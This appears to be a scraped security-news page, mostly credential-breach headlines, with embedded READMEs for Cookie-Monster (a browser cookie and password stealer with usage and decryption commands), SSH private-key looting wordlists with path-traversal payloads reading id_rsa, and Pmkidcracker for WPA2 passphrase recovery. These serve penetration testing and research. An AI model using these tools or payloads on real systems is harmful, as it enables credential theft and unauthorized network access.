Amtrak Confirms Crooks Are Breaking Into User Accounts, Derailing Email Addresses

Prevalence And Impact Of Password Exposure Vulns In ICS/OT

Why Passwords Still Matter In The Age Of AI

TikTok Hackers Target Paris Hilton, CNN, And Other High Profile Users

Secrets Exposed In Hugging Face Attack

Okta Says Customer Identity Cloud Prone To Credential Stuffing Attacks

Researchers Crack 11-Year-Old Password, Recover $3 Million In Bitcoin

BreachForums Returns Just Weeks After FBI-Led Takedown

400,000 Linux Servers Hit By Ebury Botnet

6 Mistakes Organizations Make When Deploying Advanced Authentication

AWS CloudQuarry: Digging For Secrets In Public AMIs

Google Simplifies 2-Factor Authentication Setup (It's More Important Than Ever)

Microsoft, Google Do A Victory Lap Around Passkeys

UK Outlaws Awful Default Passwords On Connected Devices

Okta Warns Of Credential Stuffing Attacks Using Tor, Residential Proxies

Scammers Offer Cash To Phone Carrier Staff To Swap SIM Cards

Attackers Are Pummeling Networks Around The World With Millions Of Login Attempts

Cookie-Monster - BOF To Steal Browser Cookies & Credentials

Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.

BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example: 
   cookie-monster --chrome 
   cookie-monster --edge 
   cookie-moster --firefox 
   cookie-monster --chromeCookiePID 1337
   cookie-monster --chromeLoginDataPID 1337
   cookie-monster --edgeCookiePID 4444
   cookie-monster --edgeLoginDataPID 4444
cookie-monster Options: 
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD 
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD 
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file 
    --chromeCookiePID, if chrome PI   D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file  
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file  

EXE usage

Cookie Monster Example:
  cookie-monster.exe --all 
Cookie Monster Options:
  -h, --help                     Show this help message and exit
  --all                          Run chrome, edge, and firefox methods
  --edge                         Extract edge keys and download Cookies/Login Data file to PWD
  --chrome                       Extract chrome keys and download Cookies/Login Data file to PWD
  --firefox                      Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make is installed on the linux prior to compiling.

make

to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

• update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI

Roku Makes 2FA Mandatory For All After Nearly 600k Accounts Pwned

More Legal Acrimony For Truth Social, As Executive Says He Was Hacked

WordPress LayerSlide Plugin Bug Risks Password Hash Extraction

TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy

Telegram Offers Premium Subscription in Exchange for Using Your Number to Send OTPs

Key Lesson from Microsoft’s Password Spray Hack: Secure Every Account

Vulnerability Allowed One-Click Takeover Of AWS Service Accounts

RedLine Malware Top Credential Stealer Of Last 6 Months

SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names

SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.

?file=../../../../../../../../home/user/.ssh/id_rsa
?file=../../../../../../../../home/user/.ssh/id_rsa-cert

This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.

• ssh-priv-key-loot-common.txt: Default and common naming conventions for SSH private key files.
• ssh-priv-key-loot-medium.txt: Probable file names without backup file extensions.
• ssh-priv-key-loot-extended.txt: Probable file names with backup file extensions.
• ssh-priv-key-loot-*_w_gui.txt: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.

These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.

This wordlist repository was inspired by John Hammond in his vlog "Don't Forget This One Hacking Trick."

Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.

ChatGPT Credentials Snagged By Infostealers On 225k Infected Devices

Meta Patches Facebook Account Takeover Vulnerability

Superusers Need Super Protection: How to Bridge Privileged Access Management and Identity Management

Five Eyes Agencies Expose APT29's Evolving Cloud Attack Tactics

SaaS Compliance through the NIST Cybersecurity Framework

Ex-Employee's Admin Credentials Used In US Gov Agency hack

Hackers Got Nearly 7 Million People's Data From 23andMe

Russian Turla Hackers Target Polish NGOs with New TinyTurla-NG Backdoor

Cybercriminals Are Stealing Face ID Scans To Break Into Bank Accounts

Azure Account Takeover Campaign Targets Senior Execs

4 Ways Hackers use Social Engineering to Bypass MFA

Deepfake Face Swap Attacks On ID Verification Systems Up By 704% In 2023

Raspberry Pi Pico Cracks BitLocker In Under A Minute

Spoutible's API Leaked 2FA Seeds, Password Reset Tokens

AnyDesk Hacked: Revokes Passwords, Certificates

Cloudflare Hacked By Suspected State-Sponsored Threat Actor

Two More Individuals Charged For DraftKings Hacking

Leaked GitHub Token Exposed Mercedes Source Code

Microsoft Fell Victim To OAuth Attack It Issued Warning About

5.3k Servers Still Vulnerable To GitLab Password Reset Flaw

Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs

340,000 Jason's Deli Customers Hit By Credential Stuffing Attack

SEC Blames SIM Swap Hack For Twitter Account Hijack

BreachForums Admin Gets 20 Years Of Supervised Release

Researcher Uncovers One Of The Biggest Password Dumps In Recent History

GitHub Rotates Credentials In Response To Vulnerability

GitLab Patches Critical Password Reset Vulnerability

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.

Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

• Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
• In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
• In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.

NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining

Babuk Tortilla Ransomware Decrypted After Hacker's Arrest

Kyocera Device Manager Vuln Exposes Enterprise Credentials

Google Accounts Accessed Without A Password

23andMe Told Victims Of Data Breach That Suing Is Futile, Letters Shows